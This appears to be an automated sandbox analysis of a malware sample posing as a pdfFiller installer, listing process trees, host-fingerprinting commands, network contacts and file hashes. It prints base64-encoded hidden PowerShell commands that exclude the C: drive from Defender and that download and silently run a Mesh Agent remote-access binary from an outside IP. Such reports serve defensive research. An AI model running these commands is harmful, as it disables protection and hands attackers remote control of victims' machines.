Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2156 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\Install(4).exe
PID 2156 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\Install(4).exe
PID 2156 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\Install(4).exe
PID 2156 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe
PID 2156 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe
PID 2156 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe
PID 3004 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp
PID 3004 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp
PID 3004 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp
PID 2932 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\Install(4).exe C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe
PID 2932 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\Install(4).exe C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe
PID 2932 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\Install(4).exe C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe
PID 3012 wrote to memory of 408 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 408 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 408 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 408 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 408 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 408 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 408 wrote to memory of 1528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 408 wrote to memory of 1528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 3012 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3056 wrote to memory of 1680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3056 wrote to memory of 1680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3056 wrote to memory of 1680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3056 wrote to memory of 2288 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3056 wrote to memory of 2288 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3056 wrote to memory of 2288 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3056 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3056 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3056 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3012 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3868 wrote to memory of 4036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3868 wrote to memory of 4036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3868 wrote to memory of 4036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3868 wrote to memory of 4420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3868 wrote to memory of 4420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3868 wrote to memory of 4420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3868 wrote to memory of 1668 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3868 wrote to memory of 1668 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3868 wrote to memory of 1668 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3012 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1328 wrote to memory of 4692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1328 wrote to memory of 4692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1328 wrote to memory of 4692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1328 wrote to memory of 736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 1328 wrote to memory of 736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 1328 wrote to memory of 736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 1328 wrote to memory of 1008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 1328 wrote to memory of 1008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 1328 wrote to memory of 1008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3012 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 4268 wrote to memory of 4440 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4268 wrote to memory of 4440 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4268 wrote to memory of 4440 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4268 wrote to memory of 3104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 4268 wrote to memory of 3104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe

"C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe"

C:\Users\Admin\AppData\Local\Temp\Install(4).exe

"C:\Users\Admin\AppData\Local\Temp\Install(4).exe"

C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe

"C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe"

C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp

"C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp" /SL5="$B0092,6038703,916992,C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe"

C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe

"C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe" -Duser.language=en -Duser.country=US -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\asm-all.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-json-ext.jar;lib\jphp-runtime.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 65001

C:\Windows\system32\reg.exe

C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 65001

C:\Windows\system32\reg.exe

C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRm9yY2UgLUV4Y2x1c2lvblBhdGggIkM6XCI=')); Invoke-Expression $script}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHVybCA9ICJodHRwOi8vNDYuOC4yMjcuMTYvdXBsb2Fkcy9tZXNoYWdlbnQzMi1tZXNoLnBuZyIKCiRvdXRwdXQgPSAiJGVudjpURU1QXG1lc2hhZ2VudDMyLW1lc2guZXhlIgoKSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkdXJsIC1PdXRGaWxlICRvdXRwdXQKCmlmIChUZXN0LVBhdGggJG91dHB1dCkgewogICAgdHJ5IHsKICAgICAgICAkcHJvY2Vzc1N0YXJ0ID0gTmV3LU9iamVjdCBTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzc1N0YXJ0SW5mbwogICAgICAgICRwcm9jZXNzU3RhcnQuRmlsZU5hbWUgPSAkb3V0cHV0CiAgICAgICAgJHByb2Nlc3NTdGFydC5Bcmd1bWVudHMgPSAiLWZ1bGxpbnN0YWxsIgogICAgICAgICRwcm9jZXNzU3RhcnQuV2luZG93U3R5bGUgPSBbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3NXaW5kb3dTdHlsZV06OkhpZGRlbgogICAgICAgIFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzc106OlN0YXJ0KCRwcm9jZXNzU3RhcnQpCiAgICB9CiAgICBjYXRjaCB7CiAgICB9Cn0KZWxzZSB7CiAKfQ==')); Invoke-Expression $script}"

C:\Program Files (x86)\pdfFiller\pdfFiller.exe

"C:\Program Files (x86)\pdfFiller\pdfFiller.exe"

C:\Users\Admin\AppData\Local\Temp\meshagent32-mesh.exe

"C:\Users\Admin\AppData\Local\Temp\meshagent32-mesh.exe" -fullinstall

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe

"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"

C:\Windows\SysWOW64\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\SysWOW64\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\SysWOW64\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\SysWOW64\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\SysWOW64\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\SysWOW64\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Users\Admin\AppData\Local\Temp\68b6811b97ee6130c2cc4fcf36991e6a

C:\Users\Admin\AppData\Local\Temp\68b6811b97ee6130c2cc4fcf36991e6a

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRm9yY2UgLUV4Y2x1c2lvblBhdGggIkM6XCI=')); Invoke-Expression $script}"

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe

"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"

C:\Windows\SysWOW64\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\SysWOW64\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\SysWOW64\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\SysWOW64\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\SysWOW64\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe

"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"

C:\Windows\SysWOW64\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\SysWOW64\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\SysWOW64\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\SysWOW64\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\SysWOW64\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe

"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"

C:\Windows\SysWOW64\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\SysWOW64\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\SysWOW64\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\SysWOW64\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\SysWOW64\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe

"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"

C:\Windows\SysWOW64\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\SysWOW64\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\SysWOW64\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Users\Admin\AppData\Local\Temp\68b6811b97ee6130c2cc4fcf36991e6a

"C:\Users\Admin\AppData\Local\Temp\68b6811b97ee6130c2cc4fcf36991e6a"

C:\Windows\SysWOW64\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\SysWOW64\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 460 -ip 460

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 460 -ip 460

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 460 -s 1264

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 460 -s 1292

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe

"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"

C:\Windows\SysWOW64\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\SysWOW64\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\SysWOW64\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\SysWOW64\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\SysWOW64\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe

"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"

C:\Windows\SysWOW64\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\SysWOW64\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\SysWOW64\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\SysWOW64\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\SysWOW64\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe

"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"

C:\Windows\SysWOW64\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\SysWOW64\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\SysWOW64\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\SysWOW64\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\SysWOW64\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\SysWOW64\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe

"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"

C:\Windows\SysWOW64\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\SysWOW64\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\SysWOW64\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\SysWOW64\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\SysWOW64\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\SysWOW64\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe

"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"

C:\Windows\SysWOW64\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\SysWOW64\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\SysWOW64\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
CZ 46.8.227.16:80 46.8.227.16 tcp
US 8.8.8.8:53 16.227.8.46.in-addr.arpa udp
CZ 46.8.227.16:80 46.8.227.16 tcp
US 8.8.8.8:53 155.170.19.2.in-addr.arpa udp
US 8.8.8.8:53 www.pdffiller.com udp
US 8.8.8.8:53 cdn.pdffiller.com udp
CZ 65.9.95.83:443 cdn.pdffiller.com tcp
GB 2.18.63.42:443 www.pdffiller.com tcp
US 8.8.8.8:53 42.63.18.2.in-addr.arpa udp
US 8.8.8.8:53 83.95.9.65.in-addr.arpa udp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
DE 193.233.254.155:443 tcp
US 8.8.8.8:53 155.254.233.193.in-addr.arpa udp
DE 193.233.254.155:443 tcp
DE 193.233.254.155:443 tcp
DE 193.233.254.155:443 tcp
DE 193.233.254.155:443 tcp
US 8.8.8.8:53 bellykmrebk.site udp
US 8.8.8.8:53 famikyjdiag.site udp
US 8.8.8.8:53 possiwreeste.site udp
US 8.8.8.8:53 commandejorsk.site udp
US 8.8.8.8:53 underlinemdsj.site udp
US 8.8.8.8:53 agentyanlark.site udp
US 8.8.8.8:53 writekdmsnu.site udp
US 8.8.8.8:53 delaylacedmn.site udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 sergei-esenin.com udp
US 104.21.53.8:443 sergei-esenin.com tcp
US 8.8.8.8:53 8.53.21.104.in-addr.arpa udp
US 8.8.8.8:53 109.234.82.104.in-addr.arpa udp
DE 193.233.254.155:443 tcp
DE 193.233.254.155:443 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
DE 193.233.254.155:443 tcp
DE 193.233.254.155:443 tcp
DE 193.233.254.155:443 tcp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe

MD5 08722dbbead04e11a0612321f27a375e
SHA1 57edfccdce2937bc6df301b6c5a2e5a97e0ec6c2
SHA256 00e9198b63906a8668f114401b18c95236562a3af9228ad35430f1fab8a884a0
